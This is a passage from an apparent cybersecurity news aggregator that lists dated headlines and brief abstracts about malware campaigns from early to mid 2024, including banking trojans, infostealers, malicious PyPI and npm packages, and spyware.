“The developers of this malware claim that it can generate up to $30,000 per ATM, making it a lucrative tool for cybercriminals,” reported the website DailyDarkweb. “The malware is fully automated, simplifying its deployment and operation.”Security Affairs
May 27, 2024
Malicious PyPI Packages Targeting Highly Specific MacOS Machines Full Text
Abstract
Cybersecurity researchers at Datadog Security Labs discovered malicious software packages targeting MacOS users through the Python Package Index (PyPI) and NPM repository.DataDog
May 27, 2024 – Government
EU Wants Universities to Work with Intelligence Agencies to Protect Their Research Full Text
Abstract
Europe’s leading research universities should work more closely with the continent’s intelligence agencies to help secure their research from being stolen by hostile states, EU member states recommended this week.The Record
May 24, 2024
BloodAlchemy Malware Used to Target Government Agencies in Southern and Southeastern Asia Full Text
Abstract
BLOODALCHEMY is an updated version of Deed RAT, which is believed to be a successor to ShadowPad malware. It has been used in attacks targeting government organizations in Southern and Southeastern Asia.Itochuci
May 22, 2024
Exploring the Depths of SolarMarker’s Multi-tiered Infrastructure Full Text
Abstract
The core of SolarMarker’s operations is its layered infrastructure, which consists of at least two clusters: a primary one for active operations and a secondary one likely used for testing new strategies or targeting specific regions or industries.Recorded Future
May 20, 2024
Latrodectus Malware Loader Emerges as Potential Replacement for IcedID Full Text
Abstract
Researchers have observed a surge in email phishing campaigns delivering Latrodectus, a new malware loader believed to be the successor to the IcedID malware, which is capable of deploying additional payloads such as QakBot, DarkGate, and PikaBot.Elastic
May 20, 2024
Grandoreiro Banking Trojan is Back With Major Updates Full Text
Abstract
The Grandoreiro banking Trojan has resurfaced with major updates, including enhanced functionality and the ability to target over 1500 global banking applications and websites in more than 60 countries, making it a more potent threat.Infosecurity Magazine
May 18, 2024
New Android Banking Trojan Mimics Google Play Update App Full Text
Abstract
A new Android banking Trojan called "Antidot" is targeting users across multiple regions by mimicking a Google Play update app and incorporating various malicious features like overlay attacks, keylogging, and remote control capabilities.Infosecurity Magazine
May 13, 2024
GoTo Meeting Software Abused to Deploy Remcos RAT via Rust Shellcode Loader Full Text
Abstract
A recent malware campaign was found exploiting the GoTo Meeting software to deploy the Remcos RAT by using DLL sideloading to execute a malicious DLL file named g2m.dll through a Rust-based shellcode loader.G DATA
May 10, 2024
Android Remote Access Trojan Equipped to Harvest Credentials Full Text
Abstract
This malware uses famous Android app icons to mislead users and trick victims into installing the malicious app on their devices. This includes the icons of Google, Instagram, Snapchat, WhatsApp, and X (formerly Twitter).SonicWall
May 8, 2024
zEus Stealer Distributed via Crafted Minecraft Source Pack Full Text
Abstract
Zeus Stealer is designed to steal sensitive information such as passwords and cryptocurrency wallets from infected systems. The attackers utilize the popularity of Minecraft to lure unsuspecting users into downloading and executing the payload.Fortinet
May 6, 2024
HijackLoader Evolves with New Evasion Techniques Full Text
Abstract
HijackLoader is a modular malware loader that is used to deliver second-stage payloads including Amadey, Lumma Stealer, Racoon Stealer v2, and Remcos RAT. HijackLoader decrypts and parses a PNG image to load the next stage.Zscaler
May 1, 2024
New Cuttlefish Malware Infects Routers to Monitor Traffic for Credential Theft Full Text
Abstract
Black Lotus Labs says the malware has been active since at least July 2023. It is currently running an active campaign concentrated in Turkey, with a few infections elsewhere impacting satellite phone and data center services.Bleeping Computer
May 1, 2024
New Wpeeper Android Malware Hides Behind Hacked WordPress Sites Full Text
Abstract
A new Android backdoor malware named 'Wpeeper' has been spotted in at least two unofficial app stores mimicking the Uptodown App Store, a popular third-party app store for Android devices with over 220 million downloads.Bleeping Computer
May 1, 2024
New Latrodectus Malware Attacks Use Microsoft, Cloudflare Themes Full Text
Abstract
Latrodectus malware is now being distributed in phishing campaigns using Microsoft Azure and Cloudflare lures to appear legitimate while making it harder for email security platforms to detect the emails as malicious.Bleeping Computer
April 27, 2024
Zero-Day from 2017 Used Along With Cobalt Strike Loader in Unholy Alliance Full Text
Abstract
The operation involves a malicious PPSX file that drops a custom loader for the Cobalt Strike Beacon malware. The loader employs various techniques to slow down analysis and bypass security solutions.Deep Instinct
April 26, 2024
New Brokewell Malware Takes Over Android Devices, Steals Data Full Text
Abstract
The malware is delivered through a fake Google Chrome update that is shown while using the web browser. Brokewell is under active development and features a mix of extensive device takeover and remote control capabilities.Bleeping Computer
April 26, 2024
Godfather Banking Trojan Spawns 1.2K Samples Across 57 Countries Full Text
Abstract
First discovered in 2022, Godfather — which can record screens and keystrokes, intercepts 2FA calls and texts, initiates bank transfers, and more — has quickly become one of the most widespread malware-as-a-service offerings in cybercrime.Dark Reading
April 24, 2024
Researchers Detail Multistage Attack Hijacking Systems with SSLoad, Cobalt Strike Full Text
Abstract
"SSLoad is designed to stealthily infiltrate systems, gather sensitive information and transmit its findings back to its operators," security researchers Den Iuzvyk, Tim Peck, and Oleg Kolesnikov said in a report shared with The Hacker News.The Hacker News
April 23, 2024
GuptiMiner: Hijacking Antivirus Updates for Distributing Backdoors and Casual Mining Full Text
Abstract
The GuptiMiner malware campaign, discovered by Avast, involved hijacking an eScan antivirus update mechanism to distribute backdoors and coinminers. The campaign was orchestrated by a threat actor with possible ties to Kimsuky.Avast
April 19, 2024
Fake Cheat Lures Gamers Into Spreading Infostealer Malware Full Text
Abstract
A new info-stealing malware linked to Redline poses as a game cheat called 'Cheat Lab,' promising downloaders a free copy if they convince their friends to install it too.Bleeping Computer
April 15, 2024
Chinese-Linked LightSpy iOS Spyware Targets South Asian iPhone Users Full Text
Abstract
Cybersecurity researchers have discovered a "renewed" cyber espionage campaign targeting users in South Asia with the aim of delivering an Apple iOS spyware implant called LightSpy.The Hacker News
April 10, 2024
Sidestepping SharePoint Security: Two New Techniques to Evade Exfiltration Detection Full Text
Abstract
These techniques can bypass the detection and enforcement policies of traditional tools, such as cloud access security brokers, data loss prevention, and SIEMs, by hiding downloads as less suspicious access and sync events.Varonis
April 9, 2024
Automating Pikabot’s String Deobfuscation Full Text
Abstract
Previous versions of Pikabot used advanced string encryption techniques, which have been replaced with simpler algorithms. Previously, the strings were encrypted using a combination of AES-CBC and RC4 algorithms.Zscaler
April 8, 2024
Fake Facebook MidJourney AI Page Promoted Malware to 1.2 Million People Full Text
Abstract
Hackers are using Facebook advertisements and hijacked pages to promote fake Artificial Intelligence services, such as MidJourney, OpenAI's SORA and ChatGPT-5, and DALL-E, to infect unsuspecting users with password-stealing malware.Bleeping Computer
April 8, 2024
Hackers can Use AI Hallucinations to Spread Malware Full Text
Abstract
One security researcher investigating AI-hallucinated libraries said late last month that he found chatbots calling for a nonexistent Python package dubbed "huggingface-cli."Healthcare Info Security
April 6, 2024
New Latrodectus Malware Replaces IcedID in Network Breaches Full Text
Abstract
While similar to IcedID, Proofpoint researchers confirmed it is an entirely new malware, likely created by the IcedID developers. Latrodectus shares infrastructure overlap with historic IcedID operations.Bleeping Computer
April 6, 2024
Visa Warns of New JSOutProx Malware Variant Targeting Financial Organizations Full Text
Abstract
First encountered in December 2019, JsOutProx is a RAT and highly obfuscated JavaScript backdoor that allows its operators to run shell commands, download additional payloads, execute files, capture screenshots, establish persistence, and more.Bleeping Computer
April 5, 2024
Bing Ad for NordVPN Leads to SecTopRAT Full Text
Abstract
A very recent malvertising campaign was found impersonating the popular VPN software NordVPN. A malicious advertiser is capturing traffic from Bing searches and redirecting users to a decoy site that looks almost identical to the real one.Malwarebytes
April 5, 2024
Byakugan – The Malware Behind a Phishing Attack Full Text
Abstract
In January 2024, FortiGuard Labs collected a PDF file written in Portuguese that distributes a multi-functional malware known as Byakugan. While this campaign was under investigation, a report about it was published.Fortinet
April 4, 2024
Distinctive Campaign Evolution of Pikabot Malware Full Text
Abstract
PikaBot, along with other malicious loaders like QBot and DarkGate, heavily depends on spam campaigns for distribution. Its initial access strategies are intricately crafted, utilizing geographically targeted spam emails for specific countries.McAfee
April 4, 2024
Magento Shoplift Malware Targets Both WordPress and Magento CMS on E-Commerce Sites Full Text
Abstract
While it pretends to be a Google Analytics script, this is merely a distraction from the true nature of the credit card skimming JavaScript code snippet embedded in the infected website.Sucuri
April 2, 2024
Vultur Banking Malware for Android Poses as McAfee Security App Full Text
Abstract
Fox-IT warned that a new, evasive version of Vultur spreads to victims through a hybrid attack that relies on SMS phishing and phone calls that trick the targets into installing a version of the malware that masquerades as the McAfee Security app.Bleeping Computer
April 1, 2024
DinodasRAT Malware Targets Linux Servers in Espionage Campaign Full Text
Abstract
When executed, the Linux variant of DinodasRAT creates a hidden file in the directory where its binary resides, which acts as a mutex to prevent multiple instances from running on the infected device.Bleeping Computer
April 1, 2024
Researchers Dissect Infostealer Malware Targeting macOS Users Full Text
Abstract
The ongoing infostealer attacks targeting macOS users may have adopted different methods to compromise victims' Macs, but operate with the end goal of stealing sensitive data, Jamf Threat Labs said in a report published Friday.JAMF
March 30, 2024
Malicious Backdoor Spotted in Linux Compression Library XZ Full Text
Abstract
This supply-chain compromise may have been caught early enough to prevent widespread exploitation, and it may only mainly affect bleeding-edge distros that picked up the latest xz versions right away.The Register
March 30, 2024
Over 100 Malicious Packages Target Popular ML PyPi Libraries Full Text
Abstract
Early on March 28, 2024, the Mend.io research team detected more than 100 malicious packages targeting the most popular machine learning (ML) libraries from the PyPi registry. Among those libraries are Pytorch, Matplotlib, and Selenium.Mend
March 28, 2024
Hackers Developing Malicious LLMs After WormGPT Falls Flat Full Text
Abstract
Cybercrooks are exploring ways to develop custom, malicious large language models after existing tools such as WormGPT failed to cater to their demands for advanced intrusion capabilities, security researchers said.Healthcare Info Security
March 28, 2024
Apps Secretly Turning Devices Into Proxy Network Nodes Removed From Google Play Full Text
Abstract
Though the LumiApps’s privacy policy talks about devices being part of the LumiApps networks, app developers might not read it before starting to use the malicious SDK in their apps.Help Net Security
March 23, 2024
New Go Loader Pushes Rhadamanthys Stealer Full Text
Abstract
PuTTY is a very popular SSH and Telnet client for Windows used by IT admins for years. The threat actor bought an ad that claims to be the PuTTY homepage and appeared at the top of the Google search results page, right before the official website.Malwarebytes
March 21, 2024
Sign1 Malware: Analysis, Campaign History & Indicators of Compromise Full Text
Abstract
The malware injects JavaScript to perform unwanted redirects by using sophisticated obfuscation techniques, including time-based randomization and XOR encoding, to evade detection.Sucuri
March 21, 2024
The Most Prevalent Malware Behaviors and Techniques Full Text
Abstract
An analysis of 100,000+ Windows malware samples has revealed the most prevalent techniques used by malware developers to successfully evade defenses, escalate privileges, execute the malware, and assure its persistence.Help Net Security
March 16, 2024
Inside the Rabbit Hole: BunnyLoader 3.0 Unveiled Full Text
Abstract
The new BunnyLoader variant comes with a Command and Control (C2) update, modularization of the binary, and various modules such as keylogger, stealer, clipper, and DoS functions.Palo Alto Networks
March 12, 2024
Malicious PyPI Packages Target Crypto Wallet Recovery Passwords in BIPClip Campaign Full Text
Abstract
The malicious packages used name squatting, disguised dependencies, and legitimate-looking code to steal mnemonic phrases, evading detection and targeting crypto assets without broader system compromise.Cyware
March 11, 2024
Fake Leather Wallet App on Apple App Store is a Crypto Drainer Full Text
Abstract
The developers of the Leather cryptocurrency wallet have issued a warning about a counterfeit app on the Apple App Store. This fake app has led to users reporting that it drains their wallets and steals their digital assets.Cyware
March 9, 2024
New Malware Campaign Found Exploiting Stored XSS in Popup Builder Full Text
Abstract
A new malware campaign was found targeting the Popup Builder WordPress plugin, exploiting a vulnerability disclosed in November 2023. The campaign injects malicious code into websites, leading to over 3,300 infections.Cyware
March 8, 2024
New Python-Based Snake Info-Stealer Spreads Through Facebook Messages Full Text
Abstract
The Snake malware campaign has been active since at least August 2023 and is attributed to Vietnamese-speaking individuals based on indicators such as targeted browsers and comments in the scripts.Cyware
March 6, 2024
Researchers Warn of Stuxnet-Style Web-Based PLC Malware Full Text
Abstract
Researchers from the Georgia Institute of Technology have developed web-based malware called IronSpider, targeting modern programmable logic controllers (PLCs) used in industrial control systems.Cyware
March 6, 2024
New WogRAT Malware Abuses Online Notepad Service to Store Malicious Code Full Text
Abstract
The 'WogRAT' malware targets both Windows and Linux systems and uses the online notepad platform 'aNotepad' to store and retrieve malicious code, making its infection chain stealthy.Cyware
March 6, 2024
Android and Windows RATs Distributed Via Online Meeting Lures Full Text
Abstract
The attackers used fake Russian-language online meeting sites hosted on a single IP address to distribute malicious APK and BAT files targeting Windows and Android users.Cyware
March 5, 2024
New CHAVECLOAK Banking Trojan Targets Brazilians via Malicious PDFs Full Text
Abstract
The malware uses DLL sideloading techniques to discreetly execute malicious code, actively monitors victims' interactions with financial portals, and communicates with a C2 server to facilitate data theft and deceptive pop-up windows.Cyware
March 5, 2024
Self-Propagating Worm Created to Target Generative AI Systems Full Text
Abstract
Researchers from Israel Institute of Technology, Intuit and Cornell Tech have developed a computer worm called "Morris II" that targets generative AI (GenAI) applications to spread malware and steal personal data.Cyware
March 1, 2024
New Bifrost Variant Uses Domain Deception Tactic to Deceive Users Full Text
Abstract
The latest variant of BIFROSE masquerades as VMware by reaching out to a deceptive domain. There has been a spike in BIFROSE activity since October 2023, and a new Arm version of the malware has been discovered.Cyware
March 1, 2024
Chinese PC-Maker Acemagic Shipped Machines Infected with Malware Full Text
Abstract
The company attributed the infection to software adjustments made by developers to reduce boot times, which inadvertently affected network settings and omitted digital signatures.Cyware
February 29, 2024
GTPDOOR Linux Malware Targets Telecoms, Exploiting GPRS Roaming Networks Full Text
Abstract
GTPDOOR is a new Linux malware designed for telecom networks that leverages the GPRS Tunnelling Protocol (GTP) for command-and-control communications, posing a threat to subscriber information and call metadata.Cyware
February 28, 2024
Malicious Code in Tornado Cash Governance Proposal Puts User Funds at Risk Full Text
Abstract
The compromise was introduced via a governance proposal, and the Tornado Cash Developers confirmed the compromise, urging users to withdraw old deposit notes and token holders to cancel their votes for the malicious proposal.Cyware
February 27, 2024
Open-Source Xeno RAT Trojan Emerges as a Potent Threat on GitHub Full Text
Abstract
The multi-stage dissemination of Xeno RAT via Discord CDN demonstrates the use of deceptive tactics such as disguised shortcut files to deliver and execute the open-source malware. (Cyware)
February 23, 2024
New Malware-as-a-Service Info-Stealer Malware Targets Oil and Gas Companies Full Text
Abstract
An advanced phishing campaign targeting the Oil and Gas industry is distributing the Rhadamanthys Stealer, an uncommon and sophisticated Malware-as-a-Service information stealer. (Cyware)
February 23, 2024
Linux Malware ‘Migo’ Targets Redis for Cryptojacking Attacks Full Text
Abstract
Researchers spotted a new Migo malware targeting Redis servers to mine cryptocurrency and utilizing system-weakening commands to disable security features. Migo is distributed as a Golang ELF binary, with compile-time obfuscation and the ability to persist on Linux hosts. Organizations are expected ... (Cyware)
February 22, 2024
Russian Consular Software Installer Backdoored to Deploy Konni RAT Full Text
Abstract
This activity is linked to actors from North Korea targeting Russia. The trojan is being distributed through backdoored software installers and is capable of file transfers and command execution. (Cyware)
February 22, 2024
New Open-Source Self-Modifying Worm Tool SSH-Snake Threatens Networks Full Text
Abstract
The worm autonomously searches for SSH credentials, modifies itself to remain fileless, and uses a variety of methods to collect private keys, making it difficult to detect statically. (Cyware)
February 21, 2024
New Malicious PyPI Packages Caught Using Covert Side-Loading Tactics Full Text
Abstract
ReversingLabs' research revealed a broader campaign involving multiple packages and sophisticated tactics, indicating an emerging trend of DLL sideloading attacks in open-source environments. (Cyware)
February 21, 2024
New ‘VietCredCare’ Stealer Targeting Facebook Advertisers in Vietnam Full Text
Abstract
The malware is distributed through links to bogus sites on social media and messaging platforms, and it is designed to filter out Facebook credentials while evading detection by security software. (Cyware)
February 21, 2024
New Migo Malware Targeting Redis Servers for Cryptocurrency Mining Full Text
Abstract
Migo disables security defenses on Redis servers, sets up keys for SSH access, and deploys a modified rootkit to hide processes and artifacts, resembling tactics used by known cryptojacking groups. (Cyware)
February 20, 2024
Newly Discovered RustDoor Malware Impersonates Visual Studio Update Full Text
Abstract
A new macOS malware dubbed RustDoor, written in Rust, is being distributed disguised as a Visual Studio update. The malware provides backdoor access to compromised systems and is linked to infrastructure associated with the BlackCat ransomware gang. Researchers have shared a list of known IOCs ... (Cyware)
February 19, 2024
Anatsa Android Trojan Bypasses Google Play Security, Expands Reach to New Countries Full Text
Abstract
The Android banking trojan Anatsa has expanded its reach to include Slovakia, Slovenia, and Czechia, demonstrating the capability to bypass restricted settings for accessibility service in Android 13. (Cyware)
February 19, 2024
PDF Malware on the Rise, Used to Spread WikiLoader, Ursnif, and DarkGate Full Text
Abstract
Cybercriminals are using ad tools to track and optimize their malware campaigns, making their lures more convincing and increasing the likelihood of users falling victim to the attacks. (Cyware)
February 17, 2024
SpyNote Android Spyware Poses as Legit Crypto Wallets, Steals Funds Full Text
Abstract
Android users are advised to be cautious of applications requesting Accessibility API access, particularly those claiming to be crypto wallets, PDF readers, and video players. (Cyware)
February 15, 2024
North Korea Turns to Designing Malware-Infected Gambling Websites for Cash Full Text
Abstract
The operation is carried out by an IT organization called "Gyeongheung," affiliated with North Korea's secretive Office 39. These websites are sold for $5,000 a month, with additional tech support for $3,000. (Cyware)
February 14, 2024
More Signs of a Qakbot Resurgence Full Text
Abstract
Security researchers have lately observed new builds and incremental changes to the malware, indicating that someone with access to its source code is experimenting with it. (Cyware)
February 13, 2024
Diving Into Glupteba’s UEFI Bootkit Full Text
Abstract
The Pay-Per-Install (PPI) ecosystem, originally intended for distributing advertisements, has evolved into a profitable platform for spreading spyware and malware, including threats like Glupteba. (Cyware)
February 10, 2024
Alert: New Stealthy “RustDoor” Backdoor Targeting Apple macOS Devices Full Text
Abstract
Apple macOS users are the target of a new Rust-based backdoor that has been operating under the radar since November 2023. The backdoor, codenamed RustDoor by Bitdefender, has been found to impersonate an update for Microsoft Visual Studio and target both Intel and Arm architectures. The exact initial access pathway used to propagate the implant is currently not known, although it's said to be distributed as FAT binaries that contain Mach-O files. Multiple variants of the malware with minor modifications have been detected to date, likely indicating active development. The earliest sample of RustDoor dates back to November 2, 2023. It comes with a wide range of commands that allow it to gather and upload files, and harvest information about the compromised endpoint. Some versions also include configurations with details about what data to collect, the list of targeted extensions and directories, and the directories to exclude. The captured information is then exfiltrate (The Hacker News)
February 09, 2024
Raspberry Robin Malware Upgrades with Discord Spread and New Exploits Full Text
Abstract
The operators of Raspberry Robin are now using two new one-day exploits to achieve local privilege escalation, even as the malware continues to be refined and improved to make it stealthier than before. This means that "Raspberry Robin has access to an exploit seller or its authors develop the exploits themselves in a short period of time," Check Point said in a report this week. Raspberry Robin (aka QNAP worm), first documented in 2021, is an evasive malware family that's known to act as one of the top initial access facilitators for other malicious payloads, including ransomware. Attributed to a threat actor named Storm-0856 (previously DEV-0856), it's propagated via several entry vectors, including infected USB drives, with Microsoft describing it as part of a "complex and interconnected malware ecosystem" with ties to other e-crime groups like Evil Corp, Silence, and TA505. Raspberry Robin's use of one-day exploits such as CVE-2020- (The Hacker News)
February 09, 2024
MoqHao Android Malware Evolves with Auto-Execution Capability Full Text
Abstract
Threat hunters have identified a new variant of Android malware called MoqHao that automatically executes on infected devices without requiring any user interaction. "Typical MoqHao requires users to install and launch the app to get their desired purpose, but this new variant requires no execution," McAfee Labs said in a report published this week. "While the app is installed, their malicious activity starts automatically." The campaign's targets include Android users located in France, Germany, India, Japan, and South Korea. MoqHao, also called Wroba and XLoader (not to be confused with the Windows and macOS malware of the same name), is an Android-based mobile threat that's associated with a Chinese financially motivated cluster dubbed Roaming Mantis (aka Shaoye). Typical attack chains commence with package delivery-themed SMS messages bearing fraudulent links that, when clicked from Android devices, lead to the deployment of the malware b (The Hacker News)
February 9, 2024
‘Coyote’ Malware Begins Its Hunt, Preying on 61 Banking Apps Full Text
Abstract
Brazilian banking trojans have a history of expanding abroad, and the emergence of new variants like "Coyote" could lead to their evolution into fully fledged initial access trojans and backdoors. (Cyware)
February 09, 2024
New Coyote Trojan Targets 61 Brazilian Banks with Nim-Powered Attack Full Text
Abstract
Sixty-one banking institutions, all of them originating from Brazil, are the target of a new banking trojan called Coyote. "This malware utilizes the Squirrel installer for distribution, leveraging Node.js and a relatively new multi-platform programming language called Nim as a loader to complete its infection," Russian cybersecurity firm Kaspersky said in a Thursday report. What makes Coyote a different breed from other banking trojans of its kind is the use of the open-source Squirrel framework for installing and updating Windows apps. Another notable departure is the shift from Delphi – which is prevalent among banking malware families targeting Latin America – to an uncommon programming language like Nim. In the attack chain documented by Kaspersky, a Squirrel installer executable is used as a launchpad for a Node.js application compiled with Electron, which, in turn, runs a Nim-based loader to trigger the execution of the malicious Coyote payload by means of (The Hacker News)
February 8, 2024
HijackLoader Expands Techniques to Improve Defense Evasion Full Text
Abstract
The HijackLoader sample exhibits complex multi-stage behavior, including process hollowing, transacted section hollowing, and user mode hook bypass using Heaven's Gate, to inject and execute the final payload while evading detection. (Cyware)
February 08, 2024
HijackLoader Evolves: Researchers Decode the Latest Evasion Methods Full Text
Abstract
The threat actors behind a loader malware called HijackLoader have added new techniques for defense evasion, as the malware continues to be increasingly used by other threat actors to deliver additional payloads and tooling. "The malware developer used a standard process hollowing technique coupled with an additional trigger that was activated by the parent process writing to a pipe," CrowdStrike researchers Donato Onofri and Emanuele Calvelli said in a Wednesday analysis. "This new approach has the potential to make defense evasion stealthier." HijackLoader was first documented by Zscaler ThreatLabz in September 2023 as having been used as a conduit to deliver DanaBot, SystemBC, and RedLine Stealer. It's also known to share a high degree of similarity with another loader known as IDAT Loader. Both the loaders are assessed to be operated by the same cybercrime group. In the intervening months, HijackLoader has been propagated via ClearFake and put to (The Hacker News)
February 08, 2024
Kimsuky’s New Golang Stealer ‘Troll’ and ‘GoBear’ Backdoor Target South Korea Full Text
Abstract
The North Korea-linked nation-state actor known as Kimsuky is suspected of using a previously undocumented Golang-based information stealer called Troll Stealer. The malware steals "SSH, FileZilla, C drive files/directories, browsers, system information, [and] screen captures" from infected systems, South Korean cybersecurity company S2W said in a new technical report. Troll Stealer's links to Kimsuky stem from its similarities to known malware families, such as AppleSeed and AlphaSeed malware that have been attributed to the group. Kimsuky, also tracked under the names APT43, ARCHIPELAGO, Black Banshee, Emerald Sleet (previously Thallium), Nickel Kimball, and Velvet Chollima, is well known for its propensity to steal sensitive, confidential information in offensive cyber operations. In late November 2023, the threat actors were sanctioned by the U.S. Treasury Department's Office of Foreign Assets Control (OFAC) for gathering intelligence to further North (The Hacker News)
February 5, 2024
New Mispadu Banking Trojan Exploits Windows SmartScreen Flaw Full Text
Abstract
The Windows SmartScreen vulnerability CVE-2023-36025 allows threat actors to bypass warnings and execute malicious payloads using crafted .url files, posing a significant security risk to Windows users. (Cyware)
February 05, 2024
Pegasus Spyware Targeted iPhones of Journalists and Activists in Jordan Full Text
Abstract
The iPhones belonging to nearly three dozen journalists, activists, human rights lawyers, and civil society members in Jordan have been targeted with NSO Group's Pegasus spyware, according to joint findings from Access Now and the Citizen Lab. Nine of the 35 individuals have been publicly confirmed as targeted, out of whom six had their devices compromised with the mercenary surveillanceware tool. The infections are estimated to have taken place from at least 2019 until September 2023. "In some cases, perpetrators posed as journalists, seeking an interview or a quote from victims, while embedding malicious links to Pegasus spyware amid and in between their messages," Access Now said. "A number of victims were reinfected with Pegasus spyware multiple times — demonstrating the relentless nature of this targeted surveillance campaign." The Israeli company has been under the radar for failing to implement rigorous human rights safeguards prior to selling (The Hacker News)
February 3, 2024
macOS Malware Campaign Showcases Novel Delivery Technique Full Text
Abstract
The backdoor, called Activator, employs a unique delivery method that backdoors the victim during the installation process, making it challenging to remove the infection even if the cracked software is removed. (Cyware)
February 02, 2024
DirtyMoe Malware Infects 2,000+ Ukrainian Computers for DDoS and Cryptojacking Full Text
Abstract
The Computer Emergency Response Team of Ukraine (CERT-UA) has warned that more than 2,000 computers in the country have been infected by a strain of malware called DirtyMoe. The agency attributed the campaign to a threat actor it calls UAC-0027. DirtyMoe, active since at least 2016, is capable of carrying out cryptojacking and distributed denial-of-service (DDoS) attacks. In March 2022, cybersecurity firm Avast revealed the malware's ability to propagate in a worm-like fashion by taking advantage of known security flaws. The DDoS botnet is known to be delivered by means of another malware referred to as Purple Fox or via bogus MSI installer packages for popular software such as Telegram. Purple Fox is also equipped with a rootkit that allows the threat actors to hide the malware on the machine and make it difficult to detect and remove. The exact initial access vector used in the campaign targeting Ukraine is currently unknown. CERT-UA is recommending that organiza (The Hacker News)
February 01, 2024
HeadCrab 2.0 Goes Fileless, Targeting Redis Servers for Crypto Mining Full Text
Abstract
Cybersecurity researchers have detailed an updated version of the malware HeadCrab that's known to target Redis database servers across the world since early September 2021. The development, which comes exactly a year after the malware was first publicly disclosed by Aqua, is a sign that the financially-motivated threat actor behind the campaign is actively adapting and refining their tactics and techniques to stay ahead of the detection curve. The cloud security firm said that "the campaign has almost doubled the number of infected Redis servers," with an additional 1,100 compromised servers, up from 1,200 reported at the start of 2023. HeadCrab is designed to infiltrate internet-exposed Redis servers and wrangle them into a botnet for illicitly mining cryptocurrency, while also leveraging the access in a manner that allows the threat actor to execute shell commands, load fileless kernel modules, and exfiltrate data to a remote server. While the origins of th (The Hacker News)
January 30, 2024
New ZLoader Malware Variant Surfaces with 64-bit Windows Compatibility Full Text
Abstract
Threat hunters have identified a new campaign that delivers the ZLoader malware, resurfacing nearly two years after the botnet's infrastructure was dismantled in April 2022. A new variant of the malware is said to have been in development since September 2023, Zscaler ThreatLabz said in an analysis published this month. "The new version of Zloader made significant changes to the loader module, which added RSA encryption, updated the domain generation algorithm, and is now compiled for 64-bit Windows operating systems for the first time," researchers Santiago Vicente and Ismael Garcia Perez said. ZLoader, also known by the names Terdot, DELoader, or Silent Night, is an offshoot of the Zeus banking trojan that first surfaced in 2015, before pivoting to functioning as a loader for next-stage payloads, including ransomware. Typically distributed via phishing emails and malicious search engine ads, ZLoader suffered a huge blow after a group of companies led by Micros (The Hacker News)
January 29, 2024
Malicious PyPI Packages Slip WhiteSnake InfoStealer Malware onto Windows Machines Full Text
Abstract
Cybersecurity researchers have identified malicious packages on the open-source Python Package Index (PyPI) repository that deliver an information-stealing malware called WhiteSnake Stealer on Windows systems. The malware-laced packages are named nigpal, figflix, telerer, seGMM, fbdebug, sGMM, myGens, NewGends, and TestLibs111. They have been uploaded by a threat actor named "WS." "These packages incorporate Base64-encoded source code of PE or other Python scripts within their setup.py files," Fortinet FortiGuard Labs said in an analysis published last week. "Depending on the victim devices' operating system, the final malicious payload is dropped and executed when these Python packages are installed." While Windows systems are infected with WhiteSnake Stealer, compromised Linux hosts are served a Python script designed to harvest information. The activity, which predominantly targets Windows users, overlaps with a prior campaign that JFrog (The Hacker News)
January 27, 2024
AllaKore RAT Malware Targeting Mexican Firms with Financial Fraud Tricks Full Text
Abstract
Mexican financial institutions are under the radar of a new spear-phishing campaign that delivers a modified version of an open-source remote access trojan called AllaKore RAT. The BlackBerry Research and Intelligence Team attributed the activity to an unknown Latin American-based financially motivated threat actor. The campaign has been active since at least 2021. "Lures use Mexican Social Security Institute (IMSS) naming schemas and links to legitimate, benign documents during the installation process," the Canadian company said in an analysis published earlier this week. "The AllaKore RAT payload is heavily modified to allow the threat actors to send stolen banking credentials and unique authentication information back to a command-and-control (C2) server for the purposes of financial fraud." The attacks appear to be designed to particularly single out large companies with gross revenues over $100 million. Targeted entities span retail, agriculture, pub (The Hacker News)
January 25, 2024
SystemBC Malware’s C2 Server Analysis Exposes Payload Delivery Tricks Full Text
Abstract
Cybersecurity researchers have shed light on the command-and-control (C2) server of a known malware family called SystemBC. "SystemBC can be purchased on underground marketplaces and is supplied in an archive containing the implant, a command-and-control (C2) server, and a web administration portal written in PHP," Kroll said in an analysis published last week. The risk and financial advisory solutions provider said it has witnessed an increase in the use of the malware throughout Q2 and Q3 2023. SystemBC, first observed in the wild in 2018, allows threat actors to remotely control a compromised host and deliver additional payloads, including trojans, Cobalt Strike, and ransomware. It also features support for launching ancillary modules on the fly to expand on its core functionality. A standout aspect of the malware revolves around its use of SOCKS5 proxies to mask network traffic to and from C2 infrastructure, acting as a persistent access mechanism for post-exploitat (The Hacker News)
January 25, 2024
LODEINFO Fileless Malware Evolves with Anti-Analysis and Remote Code Tricks Full Text
Abstract
Cybersecurity researchers have uncovered an updated version of a backdoor called LODEINFO that's distributed via spear-phishing attacks. The findings come from Japanese company ITOCHU Cyber & Intelligence, which said the malware "has been updated with new features, as well as changes to the anti-analysis (analysis avoidance) techniques." LODEINFO (versions 0.6.6 and 0.6.7) was first documented by Kaspersky in November 2022, detailing its capabilities to execute arbitrary shellcode, take screenshots, and exfiltrate files back to an actor-controlled server. A month later, ESET disclosed attacks targeting Japanese political establishments that led to the deployment of LODEINFO. The backdoor is the work of a Chinese nation-state actor known as Stone Panda (aka APT10, Bronze Riverside, Cicada, Earth Tengshe, MirrorFace, and Potassium), which has a history of orchestrating attacks targeting Japan since 2021. Attack chains commence with phishing emails bearing (The Hacker News)
January 25, 2024
Unmasking MacOS Malware in Pirated Apps Full Text
Abstract
Pirated applications targeting macOS users distribute a backdoor, allowing attackers to download and execute multiple payloads. Each application includes a malicious dylib, a backdoor, and a persistent downloader, posing a significant threat to users. The researchers from Jamf Threat Labs identified ... (Cyware)
January 23, 2024
Malicious NPM Packages Exfiltrate Hundreds of Developer SSH Keys via GitHub Full Text
Abstract
Two malicious packages discovered on the npm package registry have been found to leverage GitHub to store Base64-encrypted SSH keys stolen from developer systems on which they were installed. The modules named warbeast2000 and kodiak2k were published at the start of the month, attracting 412 and 1,281 downloads before they were taken down by the npm maintainers. The most recent downloads occurred on January 21, 2024. Software supply chain security firm ReversingLabs, which made the discovery, said there were eight different versions of warbeast2000 and more than 30 versions of kodiak2k. Both the modules are designed to run a postinstall script after installation, each capable of retrieving and executing a different JavaScript file. While warbeast2000 attempts to access the private SSH key, kodiak2k is designed to look for a key named "meow," raising the possibility that the threat actor likely used a placeholder name during the early stages of the development. (The Hacker News)
January 23, 2024
“Activator” Alert: MacOS Malware Hides in Cracked Apps, Targeting Crypto Wallets Full Text
Abstract
